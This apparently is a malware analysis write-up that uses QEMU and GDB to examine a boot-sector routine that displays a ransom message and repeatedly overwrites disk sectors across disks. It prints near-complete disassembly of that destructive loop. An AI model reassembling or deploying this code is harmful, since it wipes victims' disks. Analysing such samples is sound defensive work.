Note: Earlier, the value at cs is moved into the third and fourth bytes of the transfer buffer address (at 0x78). The purpose for this is not clear, as the instruction shown at offset 0x28 immediately overwrites it with a DWORD. This is the kind of thing that dynamic analysis will help answer.
The DAP uses these settings on the first invocation of INT 0x13 and on each error. It also resets the target LBA (0x7a - 0x81) to 1 when CF is 1 (indicating an error), when it retrieves the next disk:
45: fe 06 87 7c inc BYTE PTR ds:0x7c87
49: 66 c7 06 7a 7c 01 00 mov DWORD PTR ds:0x7c7a,0x1
50: 00 00
52: 66 c7 06 7e 7c 00 00 mov DWORD PTR ds:0x7c7e,0x0
59: 00 00
If INT 0x13 is successful (CF == 0), the loop stays on the current disk, and iterates by 199 (0xc7) sectors, where it will attempt to overwrite data with the ransom message.
5d: 66 81 06 7a 7c c7 00 add DWORD PTR ds:0x7c7a,0xc7
64: 00 00
66: 66 81 16 7e 7c 00 00 adc DWORD PTR ds:0x7c7e,0x0
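What’s interesting to me is the instruction at offset 0x66. We could decompile this line as:
*((uint32_t *)(ds+0x7c7e)) += (0x0 + CF)
At first glance, the branch leading to 0x5d is only taken if CF == 0, so the carry looks like it should always be zero. However, the ADD at 0x5d updates CF itself: it sets CF only when the low 32 bits at 0x7c7a overflow. The ADC then folds that carry into the high 32 bits at 0x7c7e, so the two instructions together form a single 64-bit increment of the LBA. The carry would only appear once the LBA passes 0xffffffff, which at 512 bytes per sector means a disk larger than 2 TiB. Dynamic analysis can show how this behaves on a small disk.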
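One way to read the ADD/ADC pair is as a single 64-bit increment split across two 32-bit halves. The sketch below models that reading in Python; the function name is hypothetical, and it assumes that ADD sets CF on unsigned overflow of the low dword and that ADC adds that CF to the high dword.

```python
MASK32 = 0xFFFFFFFF


def add_adc(low, high, increment=0xC7):
    """Model `add dword [0x7c7a], 0xc7` followed by `adc dword [0x7c7e], 0`.

    Returns (new_low, new_high, carry_after_add).
    """
    total = low + increment
    carry = total >> 32                     # CF after the 32-bit ADD: 0 or 1
    new_low = total & MASK32
    new_high = (high + 0 + carry) & MASK32  # ADC adds the immediate 0 plus CF
    return new_low, new_high, carry


if __name__ == "__main__":
    print(add_adc(1, 0))            # first successful write: no carry
    print(add_adc(0xFFFFFF39, 0))   # low dword wraps: carry moves into the high dword
```

Under this reading, the CF value returned by INT 0x13 does not matter at 0x66, because the ADD at 0x5d has already replaced it.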
Debugging
Debugging real-mode code is feasible with QEMU, but there are some limits with the way that newer versions handle it. I found it easier to install Debian 9 in a VM, update using the archive repos, and install its version of QEMU and GDB. It’s a small bit of setup, but it works fine.
$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 9.7 (stretch)
Release: 9.7
Codename: stretch
$ uname -a
Linux ... 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
$ qemu-system-x86_64 --version
QEMU emulator version 2.8.1(Debian 1:2.8+dfsg-6+deb9u17)
Copyright (c) 2003-2016 Fabrice Bellard and the QEMU Project developers
$ apt-cache policy gdb qemu-system
gdb:
Installed: 7.12-6
Candidate: 7.12-6
Version table:
*** 7.12-6 500
500 http://archive.debian.org/debian stretch/main amd64 Packages
100 /var/lib/dpkg/status
qemu-system:
Installed: 1:2.8+dfsg-6+deb9u17
Candidate: 1:2.8+dfsg-6+deb9u17
Version table:
*** 1:2.8+dfsg-6+deb9u17 500
500 http://archive.debian.org/debian-security stretch/updates/main amd64 Packages
100 /var/lib/dpkg/status
1:2.8+dfsg-6+deb9u9 500
500 http://archive.debian.org/debian stretch/main amd64 Packages
Note: Newer versions of QEMU will display inaccurate disassembly. This is annoying and gets in the way of debugging efforts.
First, run the QEMU system with debug options:
qemu-system-i386 \
-drive format=raw,file=disk.raw,index=0 \
-s -S
-s opens a GDB server on TCP port 1234, and -S pauses execution at startup so you can attach the debugger.
We can now use GDB:
$ gdb \
-ex 'target remote localhost:1234' \
-ex 'set architecture i8086' \
-ex 'break *0x7c00' \
-ex 'continue' \
-ex 'set disassembly-flavor intel' \
-ex 'x/36i $pc' \
-q
Remote debugging using localhost:1234
warning: No executable has been specified and target does not support
determining executable automatically. Try using the "file" command.
0x0000fff0 in ?? ()
warning: A handler for the OS ABI "GNU/Linux" is not built into this configuration
of GDB. Attempting to continue with the default i8086 settings.
The target architecture is assumed to be i8086
Breakpoint 1 at 0x7c00
Continuing.
Breakpoint 1, 0x00007c00 in ?? ()
=> 0x7c00: jmp 0x7c02
0x7c02: mov ax,cs
0x7c04: mov ds,ax
0x7c06: mov si,0x7c88
0x7c09: call 0x7c0c
0x7c0c: push ax
0x7c0d: cld
0x7c0e: mov al,BYTE PTR [si]
0x7c10: cmp al,0x0
0x7c12: je 0x7c1a
0x7c14: call 0x7c1c
0x7c17: inc si
0x7c18: jmp 0x7c0e
0x7c1a: jmp 0x7c21
0x7c1c: mov ah,0xe
0x7c1e: int 0x10
0x7c20: ret
0x7c21: mov ax,cs
0x7c23: mov ds,ax
0x7c25: mov ds:0x7c78,ax
0x7c28: mov DWORD PTR ds:0x7c76,0x7c82
0x7c31: mov ah,0x43
0x7c33: mov al,0x0
0x7c35: mov dl,BYTE PTR ds:0x7c87
0x7c39: add dl,0x80
0x7c3c: mov si,0x7c72
0x7c3f: int 0x13
0x7c41: jb 0x7c45
0x7c43: jae 0x7c5d
0x7c45: inc BYTE PTR ds:0x7c87
0x7c49: mov DWORD PTR ds:0x7c7a,0x1
0x7c52: mov DWORD PTR ds:0x7c7e,0x0
0x7c5b: jmp 0x7c21
0x7c5d: add DWORD PTR ds:0x7c7a,0xc7
0x7c66: adc DWORD PTR ds:0x7c7e,0x0
0x7c6f: clc
0x7c70: jmp 0x7c21
(gdb)
The disassembly matches the output from objdump, so the configuration works. The GDB command x/36i $pc, used as a command-line argument, dumps everything up to 0x70 (0x7c70 given the virtual offset). We can now run dynamic tests as needed.
There are a couple of things I want to test.
First, I want to check whether the carry flag CF is ever set when execution reaches 0x7c66, which would tell me whether the ADC instruction at offset 0x66 ever changes the upper half of the LBA. We can test this with a conditional breakpoint:
break *0x7c66 if ($eflags & 1)
continue
This will break at 0x7c66 only if CF == 1. You can continue execution. This condition is never triggered, and the process will continue indefinitely. On a small test disk, then, the ADC statement has no observable effect. That is what we would expect if CF at this point comes from the ADD at 0x5d, which only carries when the low 32 bits of the LBA wrap around.
Next, I want to see what value is actually written to 0x7c78, which falls in the range of the transfer buffer address. Restart the debugger and QEMU. Place a breakpoint at the instruction that performs the write (0x7c25), continue execution, and inspect the values:
break *0x7c25
continue
...
info reg cs eax
Both AX and CS are set to 0x0. No change is made to the transfer buffer address. The purpose of this instruction is still not clear, but at least we know it’s not altering the code in any meaningful way.